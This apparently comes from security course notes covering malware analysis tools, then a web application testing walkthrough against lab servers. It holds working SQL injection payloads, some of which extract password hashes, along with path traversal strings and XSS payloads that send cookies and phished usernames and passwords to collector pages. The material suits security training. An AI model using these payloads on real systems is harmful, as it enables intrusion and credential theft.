2452 | ||
2453 | strings --all malware.exe | head -n 6 | |
2454 | ||
2455 | strings malware.exe | grep -i dll | |
2456 | ||
2457 | strings malware.exe | grep -i library | |
2458 | ||
2459 | strings malware.exe | grep -i reg | |
2460 | ||
2461 | strings malware.exe | grep -i hkey | |
2462 | ||
2463 | strings malware.exe | grep -i hku | |
2464 | ||
2465 | - We didn't see anything like HKLM, HKCU or other registry type stuff | |
2466 | ||
2467 | strings malware.exe | grep -i irc | |
2468 | ||
2469 | strings malware.exe | grep -i join | |
2470 | ||
2471 | strings malware.exe | grep -i admin | |
2472 | ||
2473 | strings malware.exe | grep -i list | |
2474 | ||
2475 | ||
2476 | - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands | |
2477 | ||
2478 | sudo apt-get install -y python-pefile | |
2479 | ||
2480 | vi analyse_malware.py | |
2481 | ||
2482 | python analyse_malware.py malware.exe | |
2483 | ||
2484 | ||
2485 | ||
2486 | ||
2487 | Building a Malware Scanner | |
2488 | -------------------------- | |
2489 | ||
2490 | mkdir ~/Desktop/malwarescanner | |
2491 | ||
2492 | cd ~/Desktop/malwarescanner | |
2493 | ||
2494 | wget https://github.com/jonahbaron/malwarescanner/archive/master.zip | |
2495 | ||
2496 | unzip master.zip | |
2497 | ||
2498 | cd malwarescanner-master/ | |
2499 | ||
2500 | python scanner.py -h | |
2501 | ||
2502 | cat strings.txt | |
2503 | ||
2504 | cat hashes.txt | |
2505 | ||
2506 | mkdir ~/Desktop/malcode | |
2507 | ||
2508 | cp ~/Desktop/malware.exe ~/Desktop/malcode | |
2509 | ||
2510 | python scanner.py -H hashes.txt -D /home/malware/Desktop/malcode/ strings.txt | |
2511 | ||
2512 | cp ~/Desktop/ | |
2513 | ||
2514 | ||
2515 | ||
2516 | ##################################################### | |
2517 | # Analyzing Macro Embedded Malware # | |
2518 | # Reference: # | |
2519 | # https://jon.glass/analyzes-dridex-malware-p1/ # | |
2520 | ##################################################### | |
2521 | cp ~/Desktop/ | |
2522 | ||
2523 | - Create a FREE account on: | |
2524 | https://malwr.com/account/signup/ | |
2525 | ||
2526 | - Grab the malware from: | |
2527 | https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/ | |
2528 | ||
2529 | file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin | |
2530 | ||
2531 | cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin | |
2532 | ||
2533 | ||
2534 | ||
2535 | ||
2536 | sudo pip install olefile | |
2537 | ||
2538 | mkdir ~/Desktop/oledump | |
2539 | ||
2540 | cd ~/Desktop/oledump | |
2541 | ||
2542 | wget http://didierstevens.com/files/software/oledump_V0_0_22.zip | |
2543 | ||
2544 | unzip oledump_V0_0_22.zip | |
2545 | ||
2546 | cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin . | |
2547 | ||
2548 | mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc | |
2549 | ||
2550 | python oledump.py 064016.doc | |
2551 | ||
2552 | python oledump.py 064016.doc -s A4 -v | |
2553 | ||
2554 | - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams. | |
2555 | - Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'. | |
2556 | ||
2557 | ||
2558 | python oledump.py 064016.doc -s A5 -v | |
2559 | ||
2560 | - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners. | |
2561 | ||
2562 | ||
2563 | python oledump.py 064016.doc -s A3 -v | |
2564 | ||
2565 | - Look for "GVhkjbjv" and you should see: | |
2566 | ||
2567 |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| |
2568 | ||
2569 | - Take that long blob that starts with 636D and finishes with 653B and paste it in: | |
2570 | http://www.rapidtables.com/convert/number/hex-to-ascii.htm | |
2571 | ||
2572 | ||
2573 | ||
2574 | ||
2575 | ############## | |
2576 | # Yara Ninja # | |
2577 | ############## | |
2578 | cd ~/Desktop | |
2579 | ||
2580 | sudo apt-get remove -y yara | |
2581 | ||
2582 | wget https://github.com/plusvic/yara/archive/v3.4.0.zip | |
2583 | ||
2584 | sudo apt-get -y install libtool | |
2585 | ||
2586 | unzip v3.4.0.zip | |
2587 | ||
2588 | cd yara-3.4.0 | |
2589 | ||
2590 | ./bootstrap.sh | |
2591 | ||
2592 | ./configure | |
2593 | ||
2594 | make | |
2595 | ||
2596 | sudo make install | |
2597 | ||
2598 | yara -v | |
2599 | ||
2600 | cd .. | |
2601 | ||
2602 | wget https://github.com/Yara-Rules/rules/archive/master.zip | |
2603 | ||
2604 | unzip master.zip | |
2605 | ||
2606 | cd ~/Desktop | |
2607 | ||
2608 | yara rules-master/packer.yar malcode/malware.exe | |
2609 | ||
2610 | ||
2611 | Places to get more Yara rules: | |
2612 | ------------------------------ | |
2613 | https://malwareconfig.com/static/yaraRules/ | |
2614 | https://github.com/kevthehermit/YaraRules | |
2615 | https://github.com/VectraThreatLab/reyara | |
2616 | ||
2617 | ||
2618 | ||
2619 | Yara rule sorting script: | |
2620 | ------------------------- | |
2621 | https://github.com/mkayoh/yarasorter | |
2622 | ||
2623 | ||
2624 | ||
2625 | cd ~/Desktop/rules-master | |
2626 | for i in $( ls --hide=master.yar ); do echo include \"$i\";done > master.yar | |
2627 | cd ~/Desktop/ | |
2628 | yara rules-master/master.yar malcode/malware.exe | |
2629 | ||
2630 | ||
2631 | ||
2632 | ||
2633 | ||
2634 | ||
2635 | ||
2636 | ||
2637 | ||
2638 | ||
2639 | Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with: | |
2640 | http://derekmorton.name/files/malware_12-14-12.sql.bz2 | |
2641 | ||
2642 | ||
2643 | Malware Repositories: | |
2644 | http://malshare.com/index.php | |
2645 | http://www.malwareblacklist.com/ | |
2646 | http://www.virusign.com/ | |
2647 | http://virusshare.com/ | |
2648 | http://www.tekdefense.com/downloads/malware-samples/ | |
2649 | ||
2650 | ||
2651 | ||
2652 | ||
2653 | ############################### | |
2654 | # Creating a Malware Database # | |
2655 | ############################### | |
2656 | ||
2657 | Creating a malware database (sqlite) | |
2658 | ------------------------------------ | |
2659 | sudo apt-get install -y python-simplejson python-simplejson-dbg | |
2660 | wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py | |
2661 | wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip | |
2662 | unzip malware-password-is-infected.zip | |
2663 | infected | |
2664 | python avsubmit.py --init | |
2665 | python avsubmit.py -f malware.exe -e | |
2666 | ||
2667 | ||
2668 | ||
2669 | ||
2670 | ||
2671 | Creating a malware database (mysql) | |
2672 | ----------------------------------- | |
2673 | - Step 1: Installing MySQL database | |
2674 | - Run the following command in the terminal: | |
2675 | ||
2676 | sudo apt-get install mysql-server | |
2677 | ||
2678 | - Step 2: Installing Python MySQLdb module | |
2679 | - Run the following command in the terminal: | |
2680 | ||
2681 | sudo apt-get build-dep python-mysqldb | |
2682 | sudo apt-get install python-mysqldb | |
2683 | ||
2684 | Step 3: Logging in | |
2685 | Run the following command in the terminal: | |
2686 | ||
2687 | mysql -u root -p (set a password of 'malware') | |
2688 | ||
2689 | - Then create one database by running following command: | |
2690 | ||
2691 | create database malware; | |
2692 | ||
2693 | exit; | |
2694 | ||
2695 | wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py | |
2696 | ||
2697 | vi mal_to_db.py (fill in database connection information) | |
2698 | ||
2699 | python mal_to_db.py -i | |
2700 | ||
2701 | python mal_to_db.py -f malware.exe -u | |
2702 | ||
2703 | ||
2704 | mysql -u root -p | |
2705 | malware | |
2706 | ||
2707 | mysql> use malware; | |
2708 | ||
2709 | select id,md5,sha1,sha256,time FROM files; | |
2710 | ||
2711 | mysql> quit; | |
2712 | ||
2713 | ||
2714 | ||
2715 | ||
2716 | ###################################### | |
2717 | # PCAP Analysis with forensicPCAP.py # | |
2718 | ###################################### | |
2719 | cd ~/Desktop | |
2720 | wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py | |
2721 | sudo easy_install cmd2 | |
2722 | ||
2723 | python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap | |
2724 | ||
2725 | ForPCAP >>> help | |
2726 | ||
2727 | ||
2728 | Prints stats about PCAP | |
2729 | ForPCAP >>> stat | |
2730 | ||
2731 | ||
2732 | Prints all DNS requests from the PCAP file. The id before each DNS entry is the packet's id, which can be used with the "show" command. | |
2733 | ForPCAP >>> dns | |
2734 | ||
2735 | ForPCAP >>> show | |
2736 | ||
2737 | ||
2738 | Prints all destination ports from the PCAP file. The id before each entry is the packet's id, which can be used with the "show" command. | |
2739 | ForPCAP >>> dstports | |
2740 | ||
2741 | ForPCAP >>> show | |
2742 | ||
2743 | ||
2744 | Prints the number of IP sources and stores them. | |
2745 | ForPCAP >>> ipsrc | |
2746 | ||
2747 | ||
2748 | Prints the number of web requests and stores them. | |
2749 | ForPCAP >>> web | |
2750 | ||
2751 | ||
2752 | Prints the number of mail requests and stores them. | |
2753 | ForPCAP >>> mail | |
2754 | ||
2755 | ||
2756 | ||
2757 | ################### | |
2758 | # Memory Analysis # | |
2759 | ################### | |
2760 | cd /home/malware/Desktop/Banking\ Troubles/Volatility | |
2761 | ||
2762 | python volatility | |
2763 | python volatility pslist -f ../hn_forensics.vmem | |
2764 | python volatility connscan2 -f ../hn_forensics.vmem | |
2765 | python volatility memdmp -p 888 -f ../hn_forensics.vmem | |
2766 | python volatility memdmp -p 1752 -f ../hn_forensics.vmem | |
2767 | ***Takes a few min*** | |
2768 | strings 1752.dmp | grep "^http://" | sort | uniq | |
2769 | strings 1752.dmp | grep "Ahttps://" | uniq -u | |
2770 | cd .. | |
2771 | foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2 | |
2772 | cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/ | |
2773 | cat audit.txt | |
2774 | cd pdf | |
2775 | ls | |
2776 | grep -i javascript *.pdf | |
2777 | ||
2778 | ||
2779 | ||
2780 | cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf | |
2781 | wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip | |
2782 | unzip pdf-parser_V0_6_4.zip | |
2783 | python pdf-parser.py -s javascript --raw 00600328.pdf | |
2784 | python pdf-parser.py --object 11 00600328.pdf | |
2785 | python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js | |
2786 | ||
2787 | cat malicious.js | |
2788 | ||
2789 | ||
2790 | *****Sorry - no time to cover javascript de-obfuscation today***** | |
2791 | ||
2792 | ||
2793 | cd /home/malware/Desktop/Banking\ Troubles/Volatility/ | |
2794 | python volatility files -f ../hn_forensics.vmem > files | |
2795 | cat files | less | |
2796 | python volatility malfind -f ../hn_forensics.vmem -d out | |
2797 | ls out/ | |
2798 | python volatility hivescan -f ../hn_forensics.vmem | |
2799 | python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon | |
2800 | for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done | |
2801 | ||
2802 | ||
2803 | ||
2804 | Start with simple Firefox Addons: | |
2805 | ||
2806 | - ShowIP https://addons.mozilla.org/en-US/firefox/addon/showip/ | |
2807 | - Server Spy https://addons.mozilla.org/en-US/firefox/addon/server-spy/ | |
2808 | - FoxyProxy https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ | |
2809 | - Tamper Data https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ | |
2810 | - Wappalyzer https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/ | |
2811 | ||
2812 | A good list of web app testing add-ons for Firefox: | |
2813 | https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/ | |
2814 | ||
2815 | ||
2816 | ||
2817 | ||
2818 | ||
2819 | ||
2820 | ||
2821 | ################################## | |
2822 | # Basic: Web Application Testing # | |
2823 | ################################## | |
2824 | ||
2825 | Most people are going to tell you to reference the OWASP Testing Guide. | |
2826 | https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents | |
2827 | ||
2828 | I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website. | |
2829 | ||
2830 | ||
2831 | The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site. | |
2832 | ||
2833 | 1. Does the website talk to a DB? | |
2834 | - Look for parameter passing (ex: site.com/page.php?id=4) | |
2835 | - If yes - try SQL Injection | |
2836 | ||
2837 | 2. Can I or someone else see what I type? | |
2838 | - If yes - try XSS | |
2839 | ||
2840 | 3. Does the page reference a file? | |
2841 | - If yes - try LFI/RFI | |
2842 | ||
2843 | Let's start with some manual testing against 54.149.82.150 | |
2844 | ||
2845 | ||
2846 | Start here: | |
2847 | http://54.149.82.150/ | |
2848 | ||
2849 | ||
2850 | There's no parameter passing on the home page so the answer to question 1 is NO. | |
2851 | There is however a search box in the top right of the webpage, so the answer to question 2 is YES. | |
2852 | ||
2853 | Try an XSS in the search box on the home page: | |
2854 | <script>alert(123);</script> | |
2855 | ||
2856 | Doing this gives us the following in the address bar: | |
2857 | http://54.149.82.150/BasicSearch.aspx?Word=<script>alert(123);</script> | |
2858 | ||
2859 | Ok, so we've verified that there is XSS in the search box. | |
2860 | ||
2861 | Let's move on to the search box in the left of the page. | |
2862 | ||
2863 | Let's give the newsletter signup box a shot | |
2864 | ||
2865 | Moving on to the login page. | |
2866 | http://54.149.82.150/login.aspx | |
2867 | ||
2868 | I entered a single quote (') for both the user name and the password. I got the following error: | |
2869 | ||
2870 | ----------------------------------------------------------------- | |
2871 | 'Users//User[@Name=''' and @Password=''']' has an invalid token. | |
2872 | Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. | |
2873 | ||
2874 | Exception Details: System.Xml.XPath.XPathException: 'Users//User[@Name=''' and @Password=''']' has an invalid token. | |
2875 | ||
2876 | Source Error: | |
2877 | ||
2878 | ||
2879 | Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml"); | |
2880 | Line 113: string credential = "Users//User[@Name='" + UserName + "' and @Password='" + Password + "']"; | |
2881 | Line 114: XmlNodeList xmln = doc.SelectNodes(credential); | |
2882 | Line 115: //String test = xmln.ToString(); | |
2883 | Line 116: if (xmln.Count > 0) | |
2884 | ||
2885 | ----------------------------------------------------------------- | |
2886 | ||
2887 | ||
2888 | Hmm....System.Xml.XPath.XPathException.....that's not SQL. | |
2889 | ||
2890 | WTF is this: | |
2891 | Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml"); | |
2892 | ||
2893 | ||
2894 | ||
2895 | ||
2896 | In this case you'll have to trap the request with a proxy like: | |
2897 | - Firefox Tamper Data | |
2898 | - Burp Suite http://www.portswigger.net/Burp/proxy.html | |
2899 | - WebScarab https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project | |
2900 | - Rat Proxy https://code.google.com/p/ratproxy/ | |
2901 | - Zap Proxy https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project | |
2902 | - Paros http://sourceforge.net/projects/paros/ | |
2903 | ||
2904 | ||
2905 | ||
2906 | Let's go back to that page error message..... | |
2907 | ||
2908 | ||
2909 | Let's check it out: | |
2910 | http://54.149.82.150/AuthInfo.xml | |
2911 | ||
2912 | Looks like we found passwords!!!!!!!!!! | |
2913 | ||
2914 | ||
2915 | Looks like there is no significant new functionality after logging in with the stolen credentials. | |
2916 | ||
2917 | Going back to the homepage...let's see if we can see anything. Figured I'd click on one of the links | |
2918 | ||
2919 | ||
2920 | http://54.149.82.150/bookdetail.aspx?id=2 | |
2921 | ||
2922 | ||
2923 | Ok, there is parameter passing (bookdetail.aspx?id=2). | |
2924 | ||
2925 | The page name is: bookdetail.aspx | |
2926 | The parameter name is: id | |
2927 | The parameter value is: 2 | |
2928 | ||
2929 | ||
2930 | Let's try throwing a single quote (') in there: | |
2931 | ||
2932 | http://54.149.82.150/bookdetail.aspx?id=2' | |
2933 | ||
2934 | ||
2935 | I get the following error: | |
2936 | ||
2937 | Unclosed quotation mark after the character string ''. | |
2938 | Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. | |
2939 | ||
2940 | Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''. | |
2941 | ||
2942 | ||
2943 | ||
2944 | ||
2945 | ||
2946 | ||
2947 | ||
2948 | ||
2949 | ||
2950 | ||
2951 | ############################################################################# | |
2952 | # SQL Injection # | |
2953 | # https://s3.amazonaws.com/StrategicSec-Files/1-Intro_To_SQL_Intection.pptx # | |
2954 | ############################################################################# | |
2955 | ||
2956 | ||
2957 | - Another quick way to test for SQLI is to remove the parameter value | |
2958 | ||
2959 | ||
2960 | ############################# | |
2961 | # Error-Based SQL Injection # | |
2962 | ############################# | |
2963 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))-- | |
2964 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))-- | |
2965 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))-- | |
2966 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))-- | |
2967 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))-- | |
2968 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases | |
2969 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))-- | |
2970 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')-- | |
2971 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')-- | |
2972 | ||
2973 | ||
2974 | ||
2975 | ||
2976 | ############################# | |
2977 | # Union-Based SQL Injection # | |
2978 | ############################# | |
2979 | http://54.149.82.150/bookdetail.aspx?id=2 order by 100-- | |
2980 | http://54.149.82.150/bookdetail.aspx?id=2 order by 50-- | |
2981 | http://54.149.82.150/bookdetail.aspx?id=2 order by 25-- | |
2982 | http://54.149.82.150/bookdetail.aspx?id=2 order by 10-- | |
2983 | http://54.149.82.150/bookdetail.aspx?id=2 order by 5-- | |
2984 | http://54.149.82.150/bookdetail.aspx?id=2 order by 6-- | |
2985 | http://54.149.82.150/bookdetail.aspx?id=2 order by 7-- | |
2986 | http://54.149.82.150/bookdetail.aspx?id=2 order by 8-- | |
2987 | http://54.149.82.150/bookdetail.aspx?id=2 order by 9-- | |
2988 | http://54.149.82.150/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9-- | |
2989 | ||
2990 | We are using a union select statement because we are joining the developer's query with one of our own. | |
2991 | Reference: | |
2992 | http://www.techonthenet.com/sql/union.php | |
2993 | The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements. | |
2994 | It removes duplicate rows between the various SELECT statements. | |
2995 | ||
2996 | Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types. | |
2997 | ||
2998 | http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9-- | |
2999 | ||
3000 | Negating the parameter value (changing id=2 to id=-2) forces the page to display the data echoed back by the injected query. | |
3001 | ||
3002 | http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9-- | |
3003 | http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9-- | |
3004 | http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9-- | |
3005 | http://54.149.82.150/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins-- | |
3006 | ||
3007 | ||
3008 | ||
3009 | ||
3010 | ||
3011 | - Another way is to see if you can get the backend to perform an arithmetic function | |
3012 | http://54.149.82.150/bookdetail.aspx?id=(2) | |
3013 | http://54.149.82.150/bookdetail.aspx?id=(4-2) | |
3014 | http://54.149.82.150/bookdetail.aspx?id=(4-1) | |
3015 | ||
3016 | ||
3017 | ||
3018 | http://54.149.82.150/bookdetail.aspx?id=2 or 1=1-- | |
3019 | http://54.149.82.150/bookdetail.aspx?id=2 or 1=2-- | |
3020 | http://54.149.82.150/bookdetail.aspx?id=1*1 | |
3021 | http://54.149.82.150/bookdetail.aspx?id=2 or 1 >-1# | |
3022 | http://54.149.82.150/bookdetail.aspx?id=2 or 1<99# | |
3023 | http://54.149.82.150/bookdetail.aspx?id=2 or 1<>1# | |
3024 | http://54.149.82.150/bookdetail.aspx?id=2 or 2 != 3-- | |
3025 | http://54.149.82.150/bookdetail.aspx?id=2 &0# | |
3026 | ||
3027 | ||
3028 | ||
3029 | ||
3030 | ||
3031 | ############################### | |
3032 | # Blind SQL Injection Testing # | |
3033 | ############################### | |
3034 | Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER | |
3035 | ||
3036 | 3 - Total Characters | |
3037 | http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'-- | |
3038 | http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'-- | |
3039 | http://54.149.82.150/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds) | |
3040 | ||
3041 | Let's go for a quick check to see if it's DBO | |
3042 | http://54.149.82.150/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'-- | |
3043 | ||
3044 | Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun. | |
3045 | ||
3046 | D - 1st Character | |
3047 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'-- | |
3048 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'-- | |
3049 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'-- | |
3050 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds) | |
3051 | ||
3052 | B - 2nd Character | |
3053 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds | |
3054 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds | |
3055 | ||
3056 | O - 3rd Character | |
3057 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds | |
3058 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'-- | |
3059 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds | |
3060 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds | |
3061 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'-- | |
3062 | http://54.149.82.150/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds | |
3063 | ||
3064 | ||
3065 | ||
3066 | ||
3067 | ||
3068 | ||
3069 | ||
3070 | ||
3071 | ||
3072 | ||
3073 | ################################################################### | |
3074 | # What is XSS # | |
3075 | # https://s3.amazonaws.com/StrategicSec-Files/2-Intro_To_XSS.pptx # | |
3076 | ################################################################### | |
3077 | ||
3078 | OK - what is Cross Site Scripting (XSS) | |
3079 | ||
3080 | 1. Use Firefox to browse to the following location: | |
3081 | ||
3082 | http://54.172.112.249/xss_practice/ | |
3083 | ||
3084 | A really simple search page that is vulnerable should come up. | |
3085 | ||
3086 | ||
3087 | ||
3088 | ||
3089 | 2. In the search box type: | |
3090 | ||
3091 | <script>alert('So this is XSS')</script> | |
3092 | ||
3093 | ||
3094 | This should pop-up an alert window with your message in it proving XSS is in fact possible. | |
3095 | Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/ | |
3096 | ||
3097 | ||
3098 | 3. In the search box type: | |
3099 | ||
3100 | <script>alert(document.cookie)</script> | |
3101 | ||
3102 | ||
3103 | This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed. | |
3104 | Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/ | |
3105 | ||
3106 | 4. Now replace that alert script with: | |
3107 | ||
3108 | <script>document.location="http://54.172.112.249/xss_practice/cookie_catcher.php?c="+document.cookie</script> | |
3109 | ||
3110 | ||
3111 | This will actually pass your cookie to the cookie catcher that we have sitting on the webserver. | |
3112 | ||
3113 | ||
3114 | 5. Now view the stolen cookie at: | |
3115 | http://54.172.112.249/xss_practice/cookie_stealer_logs.html | |
3116 | ||
3117 | ||
3118 | The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to. | |
3119 | ||
3120 | ||
3121 | ||
3122 | ||
3123 | ||
3124 | ||
3125 | ############################ | |
3126 | # A Better Way To Demo XSS # | |
3127 | ############################ | |
3128 | ||
3129 | ||
3130 | Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box. | |
3131 | ||
3132 | ||
3133 | Use Firefox to browse to the following location: | |
3134 | ||
3135 | http://54.172.112.249/xss_practice/ | |
3136 | ||
3137 | ||
3138 | ||
3139 | Paste this in the search box | |
3140 | ---------------------------- | |
3141 | ||
3142 | ||
3143 | Option 1 | |
3144 | -------- | |
3145 | ||
3146 | <script> | |
3147 | password=prompt('Your session is expired. Please enter your password to continue',' '); | |
3148 | document.write("<img src=\"http://54.172.112.249/xss_practice/passwordgrabber.php?password=" +password+"\">"); | |
3149 | </script> | |
3150 | ||
3151 | ||
3152 | Now view the stolen password at: | |
3153 | http://54.172.112.249/xss_practice/passwords.html | |
3154 | ||
3155 | ||
3156 | ||
3157 | Option 2 | |
3158 | -------- | |
3159 | <script> | |
3160 | username=prompt('Please enter your username',' '); | |
3161 | password=prompt('Please enter your password',' '); | |
3162 | document.write("<img src=\"http://54.172.112.249/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">"); | |
3163 | </script> | |
3164 | ||
3165 | ||
3166 | ||
3167 | ||
3168 | Now view the stolen username/password at: | |
3169 | http://54.172.112.249/xss_practice/username_password_logs.html | |
3170 | ||
3171 | ||
3172 | ||
3173 | ||
3174 | ######################################### | |
3175 | # Let's kick it up a notch with ASP.NET # | |
3176 | # http://54.200.178.220/ # | |
3177 | ######################################### | |
3178 | ||
3179 | ||
3180 | The trading Web App is on http://54.200.178.220/ | |
3181 | ||
3182 | ||
3183 | Try the following in the search box: | |
3184 | <script>alert(123);</script> | |
3185 | ' or 1=1 | |
3186 | ' and a=a | |
3187 | 1=1 | |
3188 | Joe'+OR+1=1;-- | |
3189 | ||
3190 | ||
3191 | <script>alert(123);</script> | |
3192 | ||
3193 | Open a new tab in firefox and try this: | |
3194 | http://54.200.178.220/Searchresult.aspx?<script>alert(123);</script>=ScriptName | |
3195 | ||
3196 | ||
3197 | Try the contact us form. | |
3198 | Open a new tab in firefox and try this: | |
3199 | http://54.200.178.220/OpenPage.aspx?filename=../../../../../../windows/win.ini | |
3200 | ||
3201 | Try this on the inquiry form: | |
3202 | Joe McCray | |
3203 | 1234567890 | |
3204 | joe@strategicsec.com') waitfor delay '00:00:10'-- | |
3205 | ||
3206 | ||
3207 | Login Box: | |
3208 | ||
3209 | ' or 1=1 or ''=' | |
3210 | anything (click login instead of pressing enter) | |
3211 | ||
3212 | ||
3213 | ||
3214 | Tamper Data: (notice 2 session IDs) | |
3215 | ||
3216 | AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5 | |
3217 | IsAdmin=yes; | |
3218 | ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45 | |
3219 | ||
3220 | ||
3221 | ||
3222 | Profile - Detail (tamper data) | |
3223 | Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n | |
3224 | joe|set | |
3225 | ||
3226 | ||
3227 | xss_upload.txt (Upload Bulk Order) | |
3228 | <script>alert(123);</script> | |
3229 | ||
3230 | ||
3231 | ||
3232 | ||
3233 | ############################### | |
3234 | # How much fuzzing is enough? # | |
3235 | ############################### | |
3236 | There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else. | |
3237 | ||
3238 | Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do. | |
3239 | ||
3240 | ||
